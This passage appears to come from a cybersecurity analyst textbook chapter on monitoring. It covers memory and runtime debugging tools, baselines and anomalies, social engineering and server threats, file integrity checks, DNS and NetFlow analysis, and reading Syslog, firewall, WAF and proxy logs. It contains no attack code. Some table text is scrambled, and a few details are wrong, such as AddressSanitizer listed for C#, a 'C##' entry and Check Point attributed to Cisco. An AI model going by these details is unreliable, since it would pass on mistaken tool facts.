Runtime Data Integrity Check
The runtime data integrity check process ensures the
integrity of the peripheral memory contents during runtime
execution. The secure booting sequence generates a hash value
of the contents of individual memory blocks stored in secured
memory. In the runtime mode, the integrity checker reads the
contents of a memory block, waits for a specified period, and
then reads the contents of another memory block. In the
process, the checker also computes the hash values of the
memory blocks and compares them with the contents of the
reference file generated during boot time. In the event of a
mismatch between two hash values, the checker reports a
security intrusion to a central unit that decides the action to be
taken based on the security policy, as shown in Figure 11-4.
FIGURE 11-3 Secure Memory
Figure 11-4 Runtime Data Integrity Check
Memory Dumping, Runtime Debugging
Many penetration testing tools perform an operation called a
core dump or memory dump. Applications store information
in memory, and this information can include sensitive data,
passwords, usernames, and encryption keys. Hackers can use
memory-reading tools to analyze the entire memory content
used by an application. Any vulnerability testing should take
this into consideration and utilize the same tools to identify any
issues in the memory of an application. The following are some
examples of memory-reading tools:
Memdump: This free tool runs on Windows, Linux, and Solaris. It
simply creates a bit-by-bit copy of the volatile memory on a system.
KnTTools: This memory acquisition and analysis tool used with
Windows systems captures physical memory and stores it to a
removable drive or sends it over the network to be archived on a
separate machine.
FATKit: This popular memory forensics tool automates the process
of extracting interesting data from volatile memory. FATKit helps
an analyst visualize the objects it finds to help in understanding the
data that the tool was able to find.
Runtime debugging, on the other hand, is the process of
using a programming tool to not only identify syntactic
problems in code but also discover weaknesses that can lead to
memory leaks and buffer overflows. Runtime debugging tools
operate by examining and monitoring the use of memory. These
tools are specific to the language in which the code was written.
Table 11-2 shows examples of runtime debugging tools and the
operating systems and languages for which they can be used.
Table 11-2 Runtime Debugging tools
Tool
Operating
Systems
Languages
AddressS
anitizer
Linux, Mac
C, C#
Deleaker
Windows
(Visual Studio)
C, C#
software
verify
Windows
.Net, C, C##, Java, JavaScript,
Lua, Python, Ruby
Memory dumping can help determine what a hacker might be
able to learn if she were able to cause a memory dump. Runtime
debugging would be the correct approach for discovering
syntactic problems in an application’s code or to identify other
issues, such as memory leaks or potential buffer overflows.
System and Application Behavior
Sometimes an application or system will provide evidence that
something is not quite right. With proper interpretation, these
behaviors can be used to alert one of the presence of malware or
an ongoing attack. It is useful to know what behavior is normal
and what is not.
Known-good Behavior
Describing abnormal behavior is perhaps simpler than
describing normal behavior, but it is possible to develop a
performance baseline for a system that can be used to identity
operations that fall outside of the normal. A baseline is a
reference point that is defined and captured to be used as a
future reference. While capturing baselines is important, using
baselines to assess the security state is just as important. Even
the most comprehensive baselines are useless if they are never
used.
Baselines alone, however, cannot help you if you do not have
current benchmarks for comparison. A benchmark, which is a
point of reference later used for comparison, captures the same
data as a baseline and can even be used as a new baseline
should the need arise. A benchmark is compared to the baseline
to determine whether any security or performance issues exist.
Also, security professionals should keep in mind that
monitoring performance and capturing baselines and
benchmarks will affect the performance of the systems being
monitored.
Capturing both a baseline and a benchmark at the appropriate
time is important. Baselines should be captured when a system
is properly configured and fully updated. Also, baselines should
be assessed over a longer period of time, such as a week or a
month rather than just a day or an hour. When updates occur,
new baselines should be captured and compared to the previous
baselines. At that time, adopting new baselines on the most
recent data might be necessary.
Let’s look at an example. Suppose that your company’s security
and performance network has a baseline for each day of the
week. When the baselines were first captured, you noticed that
much more authentication occurs on Thursdays than on any
other day of the week. You were concerned about this until you
discovered that members of the sales team work remotely on all
days but Thursday and rarely log in to the authentication
system when they are not working in the office. For their remote
work, members of the sales team use their laptops and log in to
the VPN only when remotely submitting orders. On Thursday,
the entire sales team comes into the office and works on local
computers, ensuring that orders are being processed and
fulfilled as needed. The spike in authentication traffic on
Thursday is fully explained by the sales team’s visit. On the
other hand, if you later notice a spike in VPN traffic on
Thursdays, you should be concerned because the sales team is
working in the office on Thursdays and will not be using the
VPN.
For software developers, understanding baselines and
benchmarks also involves understanding thresholds, which
ensure that security issues do not progress beyond a configured
level. If software developers must develop measures to notify
system administrators prior to a security incident occurring, the
best method is to configure the software to send an alert, alarm,
or e-mail message when specific incidents pass the threshold.
Security professionals should capture baselines over different
times of day and days of the week to ensure that they can
properly recognize when possible issues occur. In addition,
security professionals should ensure that they are comparing
benchmarks to the appropriate baseline. Comparing a
benchmark from a Monday at 9 a.m. to a baseline from a
Saturday at 9 a.m. may not allow you to properly assess the
situation. Once you identify problem areas, you should develop
a possible solution to any issue that you discover.
Anomalous Behavior
When an application is behaving strangely and not operating
normally, it could be that the application needs to be reinstalled
or that it has been compromised by malware in some way.
While all applications occasionally have issues, persistent issues
or issues that are typically not seen or have never been seen
could indicate a compromised application:
Introduction of new accounts: Some applications have their
own account database. In that case, you may find accounts that
didn’t previously exist in the database, which should be a cause for
alarm and investigation. Many application compromises create
accounts with administrative access for the use of a malicious
individual or for the processes operating on his behalf.
Unexpected output: When the output from a program is not
what is normally expected and when dialog boxes are altered or the
order in which the boxes are displayed is not correct, it is an
indication that the application has been altered. Reports of strange
output should be investigated.
Unexpected outbound communication: Any unexpected
outbound traffic should be investigated, regardless of whether it
was discovered as a result of network monitoring or as a result of
monitoring the host or application. With regard to the application,
it can mean that data is being transmitted back to the malicious
individual.
Service interruption: When an application stops functioning
with no apparent problem, or when an application cannot seem to
communicate in the case of a distributed application, it can be a
sign of a compromised application. Any such interruptions that
cannot be traced to an application, host, or network failure should
be investigated.
Memory overflows: Memory overflow occurs when an
application uses more memory than the operating system has
assigned to it. In some cases, it simply causes the system to run
slowly, as the application uses more and more memory. In other
cases, the issue is more serious. When it is a buffer overflow, the
intent may be to crash the system or execute commands.
Exploit Techniques
Endpoints such as desktops, laptops, printers, and smartphones
account for the highest percentage of devices on the network.
They are therefore common targets. These devices are subject to
a number of security issues, as discussed in the following
sections.
Social Engineering Threats
Social engineering attacks occur when attackers use believable
language to exploit user gullibility to obtain user credentials or
some other confidential information. Social engineering threats
that you should understand include phishing/pharming,
shoulder surfing, identity theft, and dumpster diving. The best
countermeasure against social engineering threats is to provide
user security awareness training. This training should be
required and must occur on a regular basis because social
engineering techniques evolve constantly. The following are the
most common social engineering threats:
Phishing/pharming: Phishing is a social engineering attack
using e-mail in which attackers try to learn personal information,
including credit card information and financial data. This type of
attack is usually carried out by implementing a fake website that
very closely resembles a legitimate website. Users enter data,
including credentials, on the fake website, allowing the attackers to
capture any information entered. Spear phishing is a phishing
attack carried out against a specific target by learning about the
target’s habits and likes. Spear phishing attacks take longer to carry
out than phishing attacks because of the information that must be
gathered.
Pharming is similar to phishing, but pharming actually pollutes the
contents of a computer’s DNS cache so that requests to a legitimate
site are actually routed to an alternate site.
Caution users against using any links embedded in e-mail
messages, even if a message appears to have come from a legitimate
entity. Users should also review the address bar any time they
access a site where their personal information is required, to ensure
that the site is correct and that SSL is being used, which is indicated
by an HTTPS designation at the beginning of the URL address.
Shoulder surfing: Occurs when an attacker watches a user enter
login or other confidential data. Encourage users to always be aware
of who is observing their actions. Implementing privacy screens
helps ensure that data entry cannot be recorded.
Identity theft: Occurs when someone obtains personal
information, including driver’s license number, bank account
number, and Social Security number, and uses that information to
assume an identity of the individual whose information was stolen.
After the identity is assumed, the attack can go in any direction. In
most cases, attackers open financial accounts in the users name.
Attackers also can gain access to the user’s valid accounts.
Dumpster diving: Occurs when attackers examine garbage
contents to obtain confidential information. This includes
personnel information, account login information, network
diagrams, and organizational financial data. Organizations should
implement policies for shredding documents that contain this
information.
Rogue Endpoints
As if keeping up with the devices you manage is not enough, you
also have to concern yourself with the possibility of rogue
devices in the networks. Rogue endpoints are devices that
are present that you do not control or manage. In some cases,
these devices are benign, as in the case of a user bringing his
son’s laptop to work and putting it on the network. In other
cases, rogue endpoints are placed by malicious individuals.
Rogue Access Points
Rogue access points are APs that you do not control and
manage. There are two types: those that are connected to your
wired infrastructure and those that are not. The ones that are
connected to your wired network present a danger to your wired
and wireless networks. They may be placed there by your own
users without your knowledge, or they may be purposefully put
there by a hacker to gain access to the wired network. In either
case, they allow access to your wired network. Wireless
intrusion prevention system (WIPS) devices can be used to
locate rogue access points and alert administrators to their
presence. Wireless site surveys can also be conducted to detect
such threats.
Servers
While servers represent a less significant number of devices
than endpoints, they usually contain the critical and sensitive
assets and perform mission-critical services for the network.
Therefore, these devices receive the lion’s share of attention
from malicious individuals. The following are some issues that
can impact any device but that are most commonly directed at
servers:
DoS/DDoS: A denial-of-service (DoS) attack occurs when
attackers flood a device with enough requests to degrade the
performance of the targeted device. Some popular DoS attacks
include SYN floods and teardrop attacks. A distributed DoS (DDoS)
attack is a DoS attack that is carried out from multiple attack
locations. Vulnerable devices are infected with software agents
called zombies. The vulnerable devices become a botnet, which then
carries out the attack. Because of the distributed nature of the
attack, identifying all the attacking bots is virtually impossible. The
botnet also helps hide the original source of the attack.
Buffer overflow: Buffers are portions of system memory that are
used to store information. A buffer overflow occurs when the
amount of data that is submitted to an application is larger than the
buffer can handle. Typically, this type of attack is possible because
of poorly written application or operating system code, and it can
result in an injection of malicious code. To protect against this
issue, organizations should ensure that all operating systems and
applications are updated with the latest service packs and patches.
In addition, programmers should properly test all applications to
check for overflow conditions. Finally, programmers should use
input validation to ensure that the data submitted is not too large
for the buffer.
Mobile code: Mobile code is any software that is transmitted
across a network to be executed on a local system. Examples of
mobile code include Java applets, JavaScript code, and ActiveX
controls. Mobile code includes security controls, Java implements
sandboxes, and ActiveX uses digital code signatures. Malicious
mobile code can be used to bypass access controls. Organizations
should ensure that users understand the security concerns related
to malicious mobile code. Users should only download mobile code
from legitimate sites and vendors.
Emanations: Emanations are electromagnetic signals that are
emitted by an electronic device. Attackers can target certain devices
or transmission media to eavesdrop on communication without
having physical access to the device or medium. The TEMPEST
program, initiated by the United States and United Kingdom,
researches ways to limit emanations and standardizes the
technologies used. Any equipment that meets TEMPEST standards
suppresses signal emanations using shielding material. Devices that
meet TEMPEST standards usually implement an outer barrier or
coating, called a Faraday cage or Faraday shield. TEMPEST devices
are most often used in government, military, and law enforcement
settings.
Backdoor/trapdoor: A backdoor, or trapdoor, is a mechanism
implemented in many devices or applications that gives the user
who uses the backdoor unlimited access to the device or
application. Privileged backdoor accounts are the most common
type of backdoor in use today. Most established vendors no longer
release devices or applications with this security issue. You should
be aware of any known backdoors in the devices or applications you
manage.
Services
Services that run on both servers and workstations have
identities in the security system. They possess accounts called
system or service accounts that are built in, and they log on
when they operate, just as users do. They also possess privileges
and rights, and this is why security issues come up with these
accounts. These accounts typically possess many more
privileges than they actually need to perform the service. The
security issue is that if a malicious individual or process were
able to gain control of the service, the acquired rights would be
significant.
Therefore, it is important to apply the concept of least privilege
to these services by identifying the rights the services need and
limiting the services to only those rights. A common practice
has been to create a user account for the service that possesses
only the rights required and set the service to log on using that
account. You can do this in Windows by accessing the Log On
tab in the Properties dialog box of the service, as shown in
Figure 11-5. In this example, the Remote Desktop Service is set
to log on as a Network Service account. To limit this account,
you can create a new account either in the local machine or in
Active Directory, give the account the proper permissions, and
then click the Browse button, locate the account, and select it.
While this is a good approach, it involves some complications.
First is the difficulty of managing the account password. If the
domain in which the system resides has a policy that requires a
password change after 30 days and you don’t change the service
account password, the service will stop running.
Another complication involves the use of domain accounts.
While setting a service account as a domain account eliminates
the need to create an account for the service locally on each
server that runs the service, it introduces a larger security risk.
If that single domain service account were compromised, the
account would provide access to all servers running the service.
FIGURE 11-5 Log On Tab
Fortunately, with Windows Server 2008 R2 and later systems
like Windows Server 2016 and Windows Server 2019, Microsoft
introduced the concept of managed service accounts. Unlike
with regular domain accounts, in which administrators must
reset passwords manually, the network passwords for these
accounts are reset automatically. Windows Server 2012 R2
introduced the concept of group managed accounts, which allow
servers to share the same managed service account; this was not
possible with Server 2008 R2. The account password is
managed by Windows Server domain controllers and can be
retrieved by multiple Windows Server systems in an Active
Directory environment.
File System
The file system can present some opportunities for mischief.
One of the prime targets are database servers. In many ways,
the database is the Holy Grail for an attacker. It is typically
where the sensitive information resides. When considering
database security, you need to understand the following terms:
Inference: Inference occurs when someone has access to
information at one level that allows her to infer information about
another level. The main mitigation technique for inference is
polyinstantiation, which is the development of a detailed version of
an object from another object using different values in the new
object. It prevents low-level database users from inferring the
existence of higher-level data.
Aggregation: Aggregation is defined as the assembling or
compilation of units of information at one sensitivity level and
having the resultant totality of data being of a higher sensitivity
level than the individual components. So you might think of
aggregation as a different way of achieving the same goal as
inference, which is to learn information about data on a level to
which one does not have access.
Contamination: Contamination is the intermingling or mixing of
data of one sensitivity or need-to-know level with that of another.
Proper implementation of security levels is the best defense against
these problems.
Data mining warehouse: A data mining warehouse is a
repository of information from heterogeneous databases. It allows
for multiple sources of data to not only be stored in one place but to
be organized in such a way that redundancy of data is reduced
(called data normalizing). More sophisticated data mining tools are
used to manipulate the data to discover relationships that may not
have been apparent before. Along with the benefits they provide,
they also offer more security challenges.
File Integrity Monitoring
Many times, malicious software and malicious individuals make
unauthorized changes to files. In many cases these files are data
files, and in other cases they are system files. While alterations
to data files are undesirable, changes to system files can
compromise an entire system.
The solution is file integrity software that generates a hash value
of each system file and verifies that hash value at regular
intervals. This entire process is automated, and in some cases a
corrupted system file will automatically be replaced when
discovered.
While there are third-party tools such as Tripwire that do this,
Windows offers System File Checker (SFC) to do the same
thing. SFC is a command-line utility that checks and verifies the
versions of system files on a computer. If system files are
corrupted, SFC replaces the corrupted files with correct
versions. The syntax for the SFC command is as follows:
SFC [switch]
The switches vary a bit between different versions of Windows.
Table 11-3 lists the most common ones available for SFC.
Table 11-3 SFC Switches
Switch
Purpose
/CACHESIZE=X
Sets the Windows File Protection cache size,
in megabytes
/PURGECACHE
Purges the Windows File Protection cache
and scans all protected system files
immediately
/REVERT
Reverts SFC to its default operation
/SCANFILE
(Windows 7 and
Vista only)
Scans a file that you specify and fixes
problems if they are found
/SCANNOW
Immediately scans all protected system files
/SCANONCE
Scans all protected system files once
/SCANBOOT
Scans all protected system files every time
the computer is rebooted
/VERIFYONLY
Scans protected system files and does not
make any repairs or changes
/VERIFYFILE
Identifies the integrity of the file specified,
and makes any repairs or changes
/OFFBOOTDIR
Does a repair of an offline boot directory
/OFFFWINDIR
Does a repair of an offline Windows
directory
User and Entity Behavior Analytics (UEBA)
Behavioral analysis is another term for anomaly analysis. It also
observes network behaviors for anomalies. It can be
implemented using combinations of the scanning types already
covered, including NetFlow, protocol, and packet analysis to
create a baseline and subsequently report departures from the
traffic metrics found in the baseline. One of the newer advances
in this field is the development of user and entity behavior
analytics (UEBA). This type of analysis focuses on user
activities. Combining behavior analysis with machine learning,
UEBA enhances the ability to determine which particular users
are behaving oddly. An example would be a hacker who has
stolen credentials of a user and is identified by the system
because he is not performing the same activities that the user
would perform.
NETWORK
Sometimes our focus is not on endpoints or on individual
application behavior, but on network activity. Let’s look at some
types of analysis that relate to network traffic.
Uniform Resource Locator (URL) and Domain Name
System (DNS) Analysis
Malicious individuals can make use of both DNS records and
URLs to redirect network traffic in a way that benefits them.
Also, some techniques used to shorten URLs (to make them less
likely to malfunction) have resulted in the following:
Allowing spammers to sidestep spam filters as domain names like
TinyURL are automatically trusted
Preventing educated users from checking for suspect URLs by
obfuscating the actual website URL
Redirecting users to phishing sites to capture sensitive personal
information
Redirecting users to malicious sites loaded with drive-by droppers,
just waiting to download malware
Tools that can be used to analyze URLs include the following:
urlQuery is a free online service for testing and analyzing URLs,
helping with identification of malicious content on websites.
URLVoid is a free service developed by NoVirusThanks Company
that allows users to scan a website address (such as google.com or
youtube.com) with multiple website reputation engines and domain
blacklists to facilitate the detection of possible dangerous websites.
DNS Analysis
DNS provides a hierarchical naming system for computers,
services, and any resources connected to the Internet or a
private network. You should enable Domain Name System
Security Extensions (DNSSec) to ensure that a DNS server is
authenticated before the transfer of DNS information begins
between the DNS server and client. Transaction Signature
(TSIG) is a cryptographic mechanism used with DNSSEC that
allows a DNS server to automatically update client resource
records if their IP addresses or hostnames change. The TSIG
record is used to validate a DNS client.
As a security measure, you can configure internal DNS servers
to communicate only with root servers. When you configure
internal DNS servers to communicate only with root servers, the
internal DNS servers are prevented from communicating with
any other external DNS servers.
The Start of Authority (SOA) contains the information
regarding a DNS zone’s authoritative server. A DNS record’s
Time to Live (TTL) determines how long a DNS record will live
before it needs to be refreshed. When a record’s TTL expires,
the record is removed from the DNS cache. Poisoning the DNS
cache involves adding false records to the DNS zone. If you use
a longer TTL, the resource record is read less frequently and
therefore is less likely to be poisoned.
Let’s look at a security issue that involves DNS. Suppose an IT
administrator installs new DNS name servers that host the
company mail exchanger (MX) records and resolve the web
server’s public address. To secure the zone transfer between the
DNS servers, the administrator uses only server ACLs.
However, any secondary DNS servers would still be susceptible
to IP spoofing attacks.
Another scenario could occur when a security team determines
that someone from outside the organization has obtained
sensitive information about the internal organization by
querying the company’s external DNS server. The security
manager should address the problem by implementing a split
DNS server, allowing the external DNS server to contain only
information about domains that the outside world should be
aware of and enabling the internal DNS server to maintain
authoritative records for internal systems.
Domain Generation Algorithm
A domain generation algorithm (DGA) is used by
attackers to periodically generate large numbers of domain
names that can be used as rendezvous points with their
command and control servers. Detection efforts consist of using
cumbersome blacklists that must be updated often. Figure 11-6
illustrates the use of a DGA.
FIGURE 11-6 Domain Generation Algorithm
Flow Analysis
To protect data during transmission, security practitioners
should identify confidential and private information. Once this
data has been properly identified, the following flow analysis
steps should occur:
Step 1. Determine which applications and services access the
information.
Step 2. Document where the information is stored.
Step 3. Document which security controls protect the stored
information.
Step 4. Determine how the information is transmitted.
Step 5. Analyze whether authentication is used when
accessing the information. If it is, determine whether
the authentication information is securely transmitted.
If it is not, determine whether authentication can be
used.
Step 6. Analyze enterprise password policies, including
password length, password complexity, and password
expiration.
Step 7. Determine whether encryption is used to transmit
data. If it is, ensure that the level of encryption is
appropriate and that the encryption algorithm is
adequate. If it is not, determine whether encryption
can be used.
Step 8. Ensure that the encryption keys are protected.
Security practitioners should adhere to the defense-in-depth
principle to ensure that the CIA of data is ensured across its
entire life cycle. Applications and services should be analyzed to
determine whether more secure alternatives can be used or
whether inadequate security controls are deployed. Data at rest
may require encryption to provide full protection and
appropriate ACLs to ensure that only authorized users have
access. For data transmission, secure protocols and encryption
should be employed to prevent unauthorized users from being
able to intercept and read data. The most secure level of
authentication possible should be used in the enterprise.
Appropriate password and account policies can protect against
possible password attacks.
Finally, security practitioners should ensure that confidential
and private information is isolated from other information,
including locating the information on separate physical servers
and isolating data using virtual LANs (VLANs). Disable all
unnecessary services, protocols, and accounts on all devices.
Make sure that all firmware, operating systems, and
applications are kept up to date, based on vendor
recommendations and releases.
When new technologies are deployed based on the changing
business needs of the organization, security practitioners should
be diligent to ensure that they understand all the security
implications and issues with the new technology. Deploying a
new technology before proper security analysis has occurred can
result in security breaches that affect more than just the newly
deployed technology. Remember that changes are inevitable!
How you analyze and plan for these changes is what will set you
apart from other security professionals.
NetFlow Analysis
NetFlow is a technology developed by Cisco that is supported
by all major vendors and can be used to collect and
subsequently export IP traffic accounting information. The
traffic information is exported using UDP packets to a NetFlow
analyzer, which can organize the information in useful ways. It
exports records of individual one-way transmissions called
flows. When NetFlow is configured on a router interface, all
packets that are part of the same flow share the following
characteristics:
Source MAC address
Destination MAC address
IP source address
IP destination address
Source port
Destination port
Layer 3 protocol type
Class of service
Router or switch interface
Figure 11-7 shows the types of questions that can be answered
by using the NetFlow information.
When the flow information is received by the analyzer, it is
organized and can then be used to identify the following:
The top protocols in use
The top talkers in the network
Traffic patterns throughout the day
In the example in Figure 11-8, the SolarWinds NetFlow Traffic
Analyzer displays the top talking endpoints over the past hour.
FIGURE 11-7 Using NetFlow Data
Figure 11-8 NetFlow Data
There a number of tools that can be used to perform flow
analysis. Many of these tools are discussed in the next section.
Packet and Protocol Analysis
Point-in-time analysis captures data over a specified period of
time and thus provides a snapshot of the situation at that point
in time or across the specified time period. The types of analysis
described in this section involve capturing the information and
then analyzing it. Although these types of analysis all require
different tools or processes, they all follow this paradigm.
Packet Analysis
Packet analysis examines an entire packet, including the
payload. Its subset, protocol analysis, described next, is
concerned only with the information in the header of the
packet. In many cases, payload analysis is done when issues
cannot be resolved by observing the header. While the header is
only concerned with the information used to get the packet from
its source to its destination, the payload is the actual data being
communicated. When performance issues are occurring, and
there is no sign of issues in the header, looking into the payload
may reveal error messages related to the application in use that
do not present in the header. From a security standpoint,
examining the payload can reveal data that is unencrypted that
should be encrypted. It also can reveal sensitive information
that should not be leaving the network. Finally, some attacks
can be recognized by examining the application commands and
requests within the payload.
Protocol Analysis
As you just learned, protocol analysis is a subset of packet
analysis, and it involves examining information in the header of
a packet. Protocol analyzers examine these headers for
information such as the protocol in use and details involving the
communication process, such as source and destination IP
addresses and source and destination MAC addresses. From a
security standpoint, these headers can also be used to
determine whether the communication rules of the protocol are
being followed.
Malware
The handling of malware was covered earlier in this chapter and
is covered further in Chapter 12.
LOG REVIEW
While automated systems can certainly make log review easier,
these tools are not available to all cybersecurity analysts, and
they do not always catch everything. In some cases, manual log
review must still be done. The following sections look at how log
analysis is performed in the typical logs that relate to security.
Event Logs
Event logs can include security events, but other types of event
logs exist as well. Figure 11-9 shows the Windows System log,
which includes operating system events. The view has been
filtered to show only error events. Error messages indicate that
something did not work, warnings indicate a lesser issue, and
informational events are normal operations.
Figure 11-9 System Log in Event Viewer
System logs record regular system events, including operating
system and service events. Audit and security logs record
successful and failed attempts to perform certain actions and
require that security professionals specifically configure the
actions that are audited. Organizations should establish policies
regarding the collection, storage, and security of these logs. In
most cases, the logs can be configured to trigger alerts when
certain events occur. In addition, these logs must be periodically
and systematically reviewed. Cybersecurity analysts should be
trained on how to use these logs to detect when incidents have
occurred. Having all the information in the world is no help if
personnel do not have the appropriate skills to analyze it.
For large enterprises, the amount of log data that needs to be
analyzed can be quite large. For this reason, many organizations
implement a SIEM device, which provides an automated
solution for analyzing events and deciding where the attention
needs to be given.
Suppose an intrusion detection system (IDS) logged an attack
attempt from a remote IP address. One week later, the attacker
successfully compromised the network. In this case, it is likely
that no one was reviewing the IDS event logs. Consider another
example of insufficient logging and mechanisms for review. Say
that an organization did not know its internal financial
databases were compromised until the attacker published
sensitive portions of the database on several popular attacker
websites. The organization was unable to determine when, how,
or who conducted the attacks but rebuilt, restored, and updated
the compromised database server to continue operations. If the
organization is unable to determine these specifics, it needs to
look at the configuration of its system, audit, and security logs.
Syslog
Syslog is a protocol that can be used to collect logs from
devices and store them in a central location called a Syslog
server. Syslog provides a simple framework for log entry
generation, storage, and transfer that any OS, security software,
or application could use if designed to do so. Many log sources
either use Syslog as their native logging format or offer features
that allow their logging formats to be converted to Syslog
format.
Syslog messages all follow the same format because they have,
for the most part, been standardized. The Syslog packet size is
limited to 1024 bytes and carries the following information:
Facility: The source of the message. The source can be the
operating system, the process, or an application.
Severity: Rated using the following scale:
0 Emergency: System is unusable.
1 Alert: Action must be taken immediately.
2 Critical: Critical conditions.
3 Error: Error conditions.
4 Warning: Warning conditions.
5 Notice: Normal but significant conditions.
6 Informational: Informational messages.
7 Debug: Debug-level messages.
Source: The log from which this entry came.
Action: The action taken on the packet.
Source: The source IP address and port number.
Destination: The destination IP address and port number.
Each Syslog message has only three parts. The first part
specifies the facility and severity as numeric values. The second
part of the message contains a timestamp and the hostname or
IP address of the source of the log. The third part is the actual
log message, with content as shown here:
Click here to view code image
seq no:timestamp: %facility-severityMNEMONIC:description
In the following sample Syslog message, generated by a Cisco
router, no sequence number is present (it must be enabled), the
timestamp shows 47 seconds since the log was cleared, the
facility is LINK (an interface), the severity is 3, the type of event
is UP/DOWN, and the description is “Interface
GigabitEthernet0/2, changed state to up”:
Click here to view code image
00:00:47: %LINK-3-UPDOWN: Interface GigabitEthernet0/2,
changed state
to up
This example is a locally generated message on the router and
not one sent to a Syslog server. When a message is sent to the
Syslog server, it also includes the IP address of the device
sending the message to the Syslog server. Figure 11-10 shows
some output from a Syslog server that includes this additional
information.
Figure 11-10 Syslog Server
The following is a standard Syslog message, and its parts are
explained in Table 11-4:
Click here to view code image
*May 1 23:02:27.143: %SEC-6-IPACCESSLOGP: list ACL-IPv4E0/0-IN
permitted tcp 192.168.1.3(1026) -> 192.168.2.1(80), 1
packet
While Syslog message formats differ based on the device and
the type of message, this is a typical format of security-related
message.
Table 11-4 Parts of a Standard Syslog Message
Time/d
ay
*May 1 23:02:27.143
Facility
%SEC ( security)
Severit
y
6 Informational: Informational messages
Source
IPACCESSLOGP: list ACL-IPv4-E0/0-IN (name of
access list)
Action
Permitted
From
192.168.1.3 port 1026
To
192.168.2.1 port 80
Amoun
t
1 packet
No standard fields are defined within the message content; it is
intended to be human readable, and not easily machine
parsable. This provides very high flexibility for log generators,
which can place whatever information they deem important
within the content field, but it makes automated analysis of the
log data very challenging. A single source may use many
different formats for its log message content, so an analysis
program needs to be familiar with each format and should be
able to extract the meaning of the data from the fields of each
format. This problem becomes much more challenging when log
messages are generated by many sources. It might not be
feasible to understand the meaning of all log messages, and
analysis might be limited to keyword and pattern searches.
Some organizations design their Syslog infrastructures so that
similar types of messages are grouped together or assigned
similar codes, which can make log analysis automation easier to
perform.
As log security has become a greater concern, several
implementations of Syslog have been created that place a
greater emphasis on security. Most have been based on IETF’s
RFC 3195, which was designed specifically to improve the
security of Syslog. Implementations based on this standard can
support log confidentiality, integrity, and availability through
several features, including reliable log delivery, transmission
confidentiality protection, and transmission integrity protection
and authentication.
Kiwi Syslog Server
Kiwi Syslog Server is log management software that provides
centralized storage of log data and SNMP data from hosts and
appliances, based on Windows or Linux. While Kiwi combines
the functions of SNMP collector and log manager, it lacks many
of the features found in other systems; however, it is very
economical.
Firewall Logs
Examining a firewall log can be somewhat daunting at first. But
if you understand the basic layout and know what certain
acronyms stand for, you can usually find your way around a
firewall log. The following are some examples of common
firewalls.
Windows Defender
Windows operating system includes the Windows Defender
Firewall. The default path for the log is
%windir%\system32\logfiles\firewall\pfirewall.log. Figure 11-11
shows the Windows Defender Firewall with Advanced Security
interface.
Figure 11-11 Windows Defender Interface
Cisco Check Point
A Check Point log (Cisco) follows this format:
Click here to view code image
Time | Action | Firewall | Interface | Product| Source |
Source Port
| Destination | Service | Protocol | Translation | Rule
Note
These fields are used when allowing or denying traffic. Other actions, such as a
change in an object, use different fields that are beyond the scope of this
discussion.
Table 11-5 shows the meaning of each field.
Table 11-5 Check Point Firewall Fields
Fie
ld
Meaning
T
i
m
e
Local time on the management station.
A
c
t
i
o
n
Accept, deny, or drop. Accept means accept or pass the
packet, deny means send TCP reset or ICMP port
unreachable message, and drop means drop packet with no
error to the sender.
F
i
r
e
w
a
l
l
IP address or hostname of the enforcement point.
I
n
t
e
r
f
a
c
e
Firewall interface on which the packet was seen.
P
r
o
d
u
c
t
Firewall software running on the system that generated the
message.
S
o
u
r
c
e
Source IP address of packet sender.
D
e
s
t
i
n
a
t
i
o
n
Destination IP address of packet.
S
e
r
v
Destination port or service of packet.
i
c
e
P
r
o
t
o
c
o
l
Usually a Layer 4 protocol of packet (TCP, UDP, and so on).
T
r
a
n
s
l
a
t
i
o
n
The new source or destination address. (This only shows if
NAT is occurring.)
R
u
l
e
Rule number from the GUI rule base that caught this packet
and caused the log entry. (This should be the last field,
regardless of the presence or absence of other fields except
for resource messages.)
This is what a line from the log might look like:
Click here to view code image
14:55:20 accept bd.pearson.com >eth1 product VPN-1 &
Firewall-1 src
10.5.5.1 s_port 4523 dst xx.xxx.10.2 service http proto
tcp xlatesrc
xxx.xxx.146.12 rule 15
This is a log entry for permitted HTTP traffic sourced from
inside (eth1) with NAT. Table 11-6 describes the meanings of the
fields.
Table 11-6 Firewall Log Entry Field Meanings
Field
Meaning
Time
14:55:20
Action
accept
Firewall
bd.pearson.com
Interface
eth1
Product
VPN-1 & Firewall-1
Source
10.5.5.1 port 4523
Destination
xx.xxx.10.2
Service
http
Protocol
tcp
Translation
to xxx.xxx.146.12
Rule
rule 15
While other logs may be slightly different, if you understand the
examples shown here, you should be able to figure them out
pretty quickly.
Web Application Firewall (WAF)
A web application firewall (WAF) applies rule sets to an
HTTP conversation and examines all web input before
processing. These rule sets cover common attack types to which
these session types are susceptible. Among the common attacks
they address are cross-site scripting and SQL injections. A WAF
can be implemented as an appliance or as a server plug-in. In
appliance form, a WAF is typically placed directly behind the
firewall and in front of the web server farm; Figure 11-12 shows
an example.
Figure 11-12 Placement of a WAF
While all traffic is usually funneled inline through the device,
some solutions monitor a port and operate out-of-band. Table
11-7 lists the pros and cons of these two approaches. Finally,
WAFs can be installed directly on the web servers themselves.
The security issues involved with WAFs include the following:
The IT infrastructure becomes more complex.
Training on the WAF must be provided with each new release of the
web application.
Testing procedures may change with each release.
False positives may occur and can have a significant business
impact.
Troubleshooting becomes more complex.
The WAF terminating the application session can potentially have
an effect on the web application.
Table 11-7 Advantages and Disadvantages of WAF Placement
Options
Type
Inline
Advantages
Can prevent live
attacks
Disadvantages
May slow web traffic
Could block legitimate
traffic
Out-ofband
Nonintrusive
Can’t block live traffic
Doesn’t interfere with
traffic
An example pf a WAF log file is shown in Figure 11-13. In it you
can see a number of entries regarding a detected threat
attempting code tampering.
Figure 11-13 WAF Log File
Proxy
Proxy servers can be appliances, or they can be software that is
installed on a server operating system. These servers act like a
proxy firewall in that they create the web connection between
systems on their behalf, but they can typically allow and
disallow traffic on a more granular basis. For example, a proxy
server may allow the Sales group to go to certain websites while
not allowing the Data Entry group access to those same sites.
The functionality extends beyond HTTP to other traffic types,
such as FTP traffic.
Proxy servers can provide an additional beneficial function
called web caching. When a proxy server is configured to
provide web caching, it saves a copy of all web pages that have
been delivered to internal computers in a web cache. If any user
requests the same page later, the proxy server has a local copy
and need not spend the time and effort to retrieve it from the
Internet. This greatly improves web performance for frequently
requested page.
Figure 11-14 shows a view of a proxy server log. This is from the
Proxy Server CCProxy for Internet Monitoring. This view shows
who is connected and what they are doing.
Figure 11-14 Proxy Server Log
Intrusion Detection System (IDS)/Intrusion Prevention
System (IPS)
An intrusion detection system (IDS) creates a log of every
event that occurs. An intrusion prevention system (IPS)
